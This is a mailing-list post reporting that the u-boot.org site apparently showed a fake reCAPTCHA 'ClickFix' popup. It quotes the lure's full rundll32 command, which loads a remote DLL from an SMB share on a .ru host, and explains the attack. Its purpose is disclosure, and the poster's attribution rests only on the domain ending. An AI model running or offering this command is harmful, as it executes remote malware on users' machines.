Malicious CAPTCHA Popup
zayn beedooles
gb5463348 at gmail.com
Mon Feb 23 07:40:56 CET 2026
I am reporting u-boot.org for hosting a "ClickFix" malware attack. The site
uses a fake Google reCAPTCHA overlay to trick users into running a
malicious command via the Windows Run dialog.
*Malicious Command:* rundll32.exe \\hill-side-view-point.freshhill.ru
\service\verification.google,#1
The command uses rundll32.exe to execute a remote DLL from a Russian SMB
share, bypassing browser sandboxing. HAR logs confirm the site is
compromised and injecting these scripts into the user's session. This is a
high-risk social engineering attack targeting developers.
First, it tells the user to run this in the Run dialog to "continue" using
the website, but it gives the hacker control. It uses the legitimate
Windows `rundll32.exe` utility to execute code outside the browser's safe
"sandbox".
The command points to a remote SMB share on the Russian domain `
hill-side-view-point.freshhill.ru`*
It attempts to load and run a malicious DLL disguised as `
verification.google`, likely an infostealer or ransomware.
I don't know if this may be the wrong person, but I have already reported
the malware and your website to prevent more victims from getting hacked by
Russians. How do I know? "hill-side-view-point.freshhill.ru", it ends with
".ru". Thank you and have a good day.
Sincerely,
Zayn
-------------- next part --------------
A non-text attachment was scrubbed...
Name: Screenshot 2026-02-23 141707.png
Type: image/png
Size: 42007 bytes
Desc: not available
URL: <https://lists.denx.de/pipermail/u-boot/attachments/20260223/6eccb1ea/attachment-0002.png>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: Screenshot 2026-02-23 141646.png
Type: image/png
Size: 272017 bytes
Desc: not available
URL: <https://lists.denx.de/pipermail/u-boot/attachments/20260223/6eccb1ea/attachment-0003.png>
More information about the U-Boot
mailing list